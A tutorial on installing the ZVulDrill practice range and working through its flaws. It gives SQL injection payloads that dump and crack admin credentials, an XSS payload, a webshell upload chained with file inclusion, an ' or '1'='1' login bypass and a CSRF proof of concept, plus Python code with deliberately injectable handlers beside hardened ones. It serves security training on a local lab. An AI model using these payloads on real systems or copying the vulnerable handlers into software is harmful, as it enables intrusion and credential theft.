ZVulDrill installation and walkthrough tutorial
2022-06-11 06:17:00 【H-feng】
I. Installation
1. Download the installation package
Download link: https://github.com/710leo/ZVulDrill
2. Download phpStudy
Download link: https://www.xp.cn/download.html
Pick whichever version suits you; by default it installs to the D: drive.
Note: phpStudy is a convenient integrated environment that bundles Apache, MySQL and so on. Later ranges such as pikachu can be set up with phpStudy as well.
3. Unzip the downloaded package into phpStudy's www directory

4. Set the database password in the config file
Edit config.php under the sys directory and set the database password to root, so that it matches phpStudy's default MySQL account (root/root). Keep these default credentials confined to the lab machine.

5. Import the database
Method 1:
Create a database named zvuldrill and import the data file that ships with ZVulDrill into it.

Method 2:
Open 127.0.0.1/phpmyadmin (account and password are both root).

Select the corresponding .sql file and import it.
6. Start the services and open the range
Visit http://127.0.0.1/ZVulDrill/ or http://localhost/ZVulDrill/.
If the page loads, the setup succeeded. Now on to the range itself.
II. Range walkthrough
1. XSS
The first thing on the page is a search box, and my first thought was XSS, following the old rule "see a box, inject a payload". (After logging in, changing the user name to a payload also triggers XSS.)
Payload:

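As an added example (not code from ZVulDrill or from the original post), the two sinks mentioned above rendered first without escaping and then with it: the search box reflects its input, and the user name saved at edit time is stored and echoed on every later page view. The templates and the test payload are constructed assumptions, not the payload from the original screenshot.

```python
import html

# Added example, not ZVulDrill code. Constructed templates standing in for the
# two sinks the walkthrough points at; PAYLOAD is an assumed test string.

PAYLOAD = "<script>alert(1)</script>"

def render_search_vulnerable(query):
    """Reflected XSS: the search term goes straight back into the HTML."""
    return f"<p>Results for: {query}</p>"

def render_profile_vulnerable(user_name):
    """Stored XSS: the name saved on the edit page is echoed on every later view."""
    return f'<div class="welcome">Welcome back, {user_name}</div>'

def render_search_safe(query):
    # html.escape is the right encoder for text content and quoted attributes;
    # other contexts (JS strings, URLs, unquoted attributes) need their own.
    return f"<p>Results for: {html.escape(query)}</p>"

def render_profile_safe(user_name):
    return f'<div class="welcome">Welcome back, {html.escape(user_name)}</div>'

def injected(page):
    """True if the payload reaches the browser as live markup rather than text."""
    return PAYLOAD in page
```

Both vulnerable renderers hand the payload to the browser verbatim; the safe ones emit `&lt;script&gt;...`, which the browser displays as text.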
2. SQL injection
The page shown after the XSS step reminded me of SQL injection on earlier ranges.
Entering a single quote ' makes the back end throw an error,
so I suspected single-quote-delimited, error-based injection. Next, determine the number of columns.
Payload: 1' and 1=1 order by 5 --+
order by 5 errors while order by 4 does not, so the query has 4 columns. (The + after -- is URL-decoded to a space, which MySQL requires after the comment marker.)
Next, find the echo points directly:
Payload: 1' and 1=2 union select 1,2,3,4 --+
Columns 2 and 3 are both echoed on the page.
List all table names:
Payload: 1' and 1=2 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database() --+
Three tables show up: admin, comment, users.
Next, list all columns of the admin table:
Payload: 1' and 1=2 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name='admin' --+
There are three columns: admin_id, admin_name, admin_pass.
Now read the contents of those columns:
Payload: 1' and 1=2 union select 1,2,group_concat(admin_name,0x7e,admin_pass),4 from admin --+
(0x7e is the MySQL hex literal for ~, used as a separator.) The password comes back as what looks like an MD5 hash; looking it up in an MD5 database gives admin.
Next I tried to log in. admin/admin failed on the normal login page, so I suspected a separate admin back end; a directory scan with a tool found the back-end login address, and admin/admin logged in there successfully.
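As an added example (not ZVulDrill's code or the author's), the union-injection steps above run offline against an in-memory stand-in for the vulnerable search page. SQLite replaces MySQL, so the schema enumeration reads sqlite_master and pragma_table_info() instead of information_schema; the four-column query with columns 2 and 3 echoed, the three tables and the admin row are constructed to match what the walkthrough found. It goes slightly beyond the text by turning the ORDER BY probe into a loop and by finishing with the offline MD5 lookup.

```python
import hashlib
import sqlite3
from urllib.parse import unquote_plus

# Added example, not ZVulDrill code. Constructed schema and rows; SQLite stands
# in for MySQL, so table/column discovery uses sqlite_master and
# pragma_table_info() where the walkthrough used information_schema.

def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE admin   (admin_id INTEGER, admin_name TEXT, admin_pass TEXT);
        CREATE TABLE comment (comment_id INTEGER, user_name TEXT, body TEXT, created TEXT);
        CREATE TABLE users   (user_id INTEGER, user_name TEXT, password TEXT);
    """)
    conn.execute("INSERT INTO admin VALUES (1, 'admin', ?)",
                 (hashlib.md5(b"admin").hexdigest(),))
    conn.execute("INSERT INTO comment VALUES (1, 'alice', 'first post', '2022-06-11')")
    conn.execute("INSERT INTO users VALUES (1, 'alice', ?)",
                 (hashlib.md5(b"alice123").hexdigest(),))
    conn.commit()
    return conn

def search_vulnerable(conn, typed):
    # The payload is typed into the URL; the server URL-decodes it, which is
    # what turns `--+` into `-- ` (a valid comment) before the query runs.
    value = unquote_plus(typed)
    sql = ("SELECT comment_id, user_name, body, created FROM comment "
           "WHERE user_name = '" + value + "'")          # string splicing: injectable
    return conn.execute(sql).fetchall()

def search_safe(conn, typed):
    value = unquote_plus(typed)
    sql = "SELECT comment_id, user_name, body, created FROM comment WHERE user_name = ?"
    return conn.execute(sql, (value,)).fetchall()        # bound parameter: data stays data

def count_columns(conn, limit=20):
    """ORDER BY n probe: the first n that errors is one past the column count."""
    for n in range(1, limit + 1):
        try:
            search_vulnerable(conn, f"1' order by {n} --+")
        except sqlite3.OperationalError:
            return n - 1
    return None

def echo_points(conn):
    """UNION a row of markers; the positions that reach the page are the echo points."""
    return search_vulnerable(conn, "1' and 1=2 union select 1,2,3,4 --+")[0]

def list_tables(conn):
    rows = search_vulnerable(conn, "1' and 1=2 union select 1,2,group_concat(name),4 "
                                   "from sqlite_master where type='table' --+")
    return sorted(rows[0][2].split(","))

def list_columns(conn, table):
    rows = search_vulnerable(conn, "1' and 1=2 union select 1,2,group_concat(name),4 "
                                   f"from pragma_table_info('{table}') --+")
    return rows[0][2].split(",")

def dump_admin(conn):
    # MySQL form: group_concat(admin_name,0x7e,admin_pass); SQLite concatenates with ||
    rows = search_vulnerable(conn, "1' and 1=2 union select 1,2,"
                                   "group_concat(admin_name||'~'||admin_pass),4 from admin --+")
    name, digest = rows[0][2].split("~")
    return name, digest

def crack_md5(digest, candidates):
    """Offline lookup: an unsalted MD5 of a common word falls to a tiny wordlist."""
    for word in candidates:
        if hashlib.md5(word.encode()).hexdigest() == digest:
            return word
    return None
```

`search_safe` receives exactly the same payloads and returns nothing, because the bound parameter is compared as a literal user name rather than parsed as SQL.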


3. File upload vulnerability
Next, register an account and log in. Clicking Edit reveals an image upload.

Upload a PHP webshell: the upload handler applies no filtering at all (a one-line webshell works just as well).
The response does not return the saved path; find it in the page source, or capture the traffic.
Access 1.php directly.
4. File inclusion vulnerability
Visiting About shows a URL of the form about.php?f=..., which suggests a file inclusion vulnerability.
Point f at the webshell just uploaded.
The inclusion succeeds.
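As an added example (not ZVulDrill's code), the two server-side handlers that sections 3 and 4 chain together, the profile image upload and the about.php?f= include, each shown beside a hardened version. The directory layout, file names, the allow-list of pages and the file bodies are constructed so the chain can be exercised offline; the webshell is replaced by a harmless marker string.

```python
import os
import secrets
import tempfile

# Added example, not ZVulDrill code. Constructed upload and page directories;
# the stored file is a marker string standing in for the walkthrough's webshell.

IMAGE_MAGIC = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff", "gif": b"GIF8"}
PAGES = {"about": "about.html", "contact": "contact.html"}   # assumed allow-list

def upload_vulnerable(upload_dir, client_name, data):
    """No checks: 1.php is stored under the name and with the body the client chose."""
    path = os.path.join(upload_dir, client_name)
    with open(path, "wb") as fh:
        fh.write(data)
    return path

def upload_hardened(upload_dir, client_name, data):
    """Extension allow-list, magic-byte check and a server-chosen name. The
    uploads directory must also be served with script execution disabled: a
    PHP body behind a valid PNG header still passes the magic-byte check."""
    ext = client_name.rsplit(".", 1)[-1].lower() if "." in client_name else ""
    if ext not in IMAGE_MAGIC:
        raise ValueError("extension not allowed")
    if not data.startswith(IMAGE_MAGIC[ext]):
        raise ValueError("body is not a " + ext + " image")
    path = os.path.join(upload_dir, secrets.token_hex(8) + "." + ext)
    with open(path, "wb") as fh:
        fh.write(data)
    return path

def include_vulnerable(pages_dir, f):
    """about.php?f=... with no validation: ../ or an absolute path reads anything."""
    with open(os.path.join(pages_dir, f), "rb") as fh:
        return fh.read()

def include_hardened(pages_dir, f):
    """Map the parameter through an allow-list, then confirm the resolved path
    still lies inside pages_dir before opening it."""
    name = PAGES.get(f)
    if name is None:
        raise PermissionError("unknown page")
    base = os.path.realpath(pages_dir)
    target = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError("path escapes the pages directory")
    with open(target, "rb") as fh:
        return fh.read()

def demo():
    """Run the upload-then-include chain against both pairs of handlers."""
    root = tempfile.mkdtemp()
    uploads = os.path.join(root, "uploads")
    pages = os.path.join(root, "pages")
    os.makedirs(uploads)
    os.makedirs(pages)
    with open(os.path.join(pages, "about.html"), "wb") as fh:
        fh.write(b"<h1>About</h1>")
    marker = b"<?php echo 'uploaded'; ?>"   # constructed stand-in for the webshell
    results = {}
    upload_vulnerable(uploads, "1.php", marker)
    results["chain_works"] = include_vulnerable(pages, "../uploads/1.php") == marker
    try:
        upload_hardened(uploads, "1.php", marker)
        results["upload_blocked"] = False
    except ValueError:
        results["upload_blocked"] = True
    try:
        include_hardened(pages, "../uploads/1.php")
        results["include_blocked"] = False
    except PermissionError:
        results["include_blocked"] = True
    png = IMAGE_MAGIC["png"] + b"\x00" * 16
    results["png_ok"] = upload_hardened(uploads, "avatar.png", png).endswith(".png")
    results["about_ok"] = include_hardened(pages, "about") == b"<h1>About</h1>"
    return results
```

`demo()` shows the chain succeeding against the unchecked pair and failing at both links against the hardened pair, while a real PNG and the legitimate about page still work.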
5. Universal password bypass
Enter ' or '1'='1' --+ as both the account and the password and the login is bypassed.
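As an added example (not ZVulDrill's code), a constructed users table with two login functions: the splicing style that the universal password relies on, and the parameterised form that defeats it. SQLite stands in for MySQL, and the form field is URL-decoded first, which is what turns `--+` into `-- `. Whether the password field is hashed before use is an assumption about this stand-in, not a statement about ZVulDrill.

```python
import hashlib
import hmac
import sqlite3
from urllib.parse import unquote_plus

# Added example, not ZVulDrill code. Constructed table and account.

def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, user_name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'alice', ?)",
                 (hashlib.md5(b"alice123").hexdigest(),))
    conn.commit()
    return conn

def login_vulnerable(conn, user_name, password):
    """The password is hashed before splicing, so the payload in that field is
    inert here; the unquoted user_name is what rewrites the WHERE clause:
    WHERE user_name = '' or '1'='1' -- ' AND password = '...'"""
    user_name = unquote_plus(user_name)
    digest = hashlib.md5(password.encode()).hexdigest()
    sql = ("SELECT user_name FROM users WHERE user_name = '" + user_name +
           "' AND password = '" + digest + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_safe(conn, user_name, password):
    """Bound parameter plus constant-time hash comparison. A complete fix would
    also replace unsalted MD5 with a slow, salted password hash."""
    user_name = unquote_plus(user_name)
    row = conn.execute("SELECT password FROM users WHERE user_name = ?",
                       (user_name,)).fetchone()
    if row is None:
        return None
    digest = hashlib.md5(password.encode()).hexdigest()
    return user_name if hmac.compare_digest(row[0], digest) else None
```

With the tautology in the user name, `login_vulnerable` returns the first account in the table regardless of password; `login_safe` looks for a user literally named `' or '1'='1' -- ` and finds none.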

6. Directory traversal (directory listing)
The directory scan just now turned up many directories.
Visiting each directory lists the files inside it.
7. CSRF vulnerability
Capture the request at the change-password page.
Generate a CSRF PoC from that request.

Copy the PoC and open it directly.
After forwarding the intercepted request you land straight on the page, with the password changed.
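As an added example (not ZVulDrill's code and not Burp's generator), what a CSRF PoC generator does with the captured change-password request, followed by the server-side check that makes the PoC a no-op. The raw request, its path, host and field names are constructed assumptions, not ZVulDrill's real endpoint.

```python
import hmac
import html
from urllib.parse import parse_qsl

# Added example. CAPTURED is a constructed change-password request; the path
# and field names are assumptions standing in for whatever Burp captured.
CAPTURED = (
    "POST /ZVulDrill/user/changepass.php HTTP/1.1\r\n"
    "Host: 127.0.0.1\r\n"
    "Cookie: PHPSESSID=victimsession\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "newpass=hacked123&repass=hacked123&submit=Save"
)

def parse_request(raw):
    """Split a raw HTTP request into method, path, lower-cased headers and form fields."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    fields = dict(parse_qsl(body, keep_blank_values=True))
    return method, path, headers, fields

def build_csrf_poc(raw, scheme="http"):
    """Auto-submitting form. The cookie is deliberately absent: the victim's
    browser attaches the session cookie itself when the form posts."""
    method, path, headers, fields = parse_request(raw)
    action = f"{scheme}://{headers['host']}{path}"
    inputs = "\n".join(
        f'    <input type="hidden" name="{html.escape(k, quote=True)}" '
        f'value="{html.escape(v, quote=True)}">'
        for k, v in fields.items()
    )
    return (
        "<html><body>\n"
        f'  <form id="csrf" action="{html.escape(action, quote=True)}" method="{method}">\n'
        f"{inputs}\n"
        "  </form>\n"
        "  <script>document.getElementById('csrf').submit();</script>\n"
        "</body></html>\n"
    )

def request_allowed(session_token, headers, fields):
    """Defence: the form must carry the token bound to the victim's session
    (a cross-origin page cannot read it) and the Origin/Referer must be our own
    site. Either check alone defeats the PoC above; use both."""
    if not hmac.compare_digest(fields.get("csrf_token", ""), session_token):
        return False
    own = "http://" + headers.get("host", "")
    origin = headers.get("origin") or headers.get("referer", "")
    return origin == own or origin.startswith(own + "/")
```

The generated page carries every form field from the capture but no cookie; the browser supplies that when the victim opens the page while logged in, which is why the request succeeds without the attacker knowing the session.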
III. Summary
This range suits a beginner like me very well. If you have any questions about the steps above, feel free to contact me.
Note: the range also contains a stored XSS, a privilege (horizontal access) flaw and a brute-force vulnerability. Brute force can be done directly in Burp. For the privilege flaw I found that any username and password could log in, so I did not try it. For the stored XSS I could not post on the message board; the source code may have a bug, which anyone fluent in PHP can fix themselves.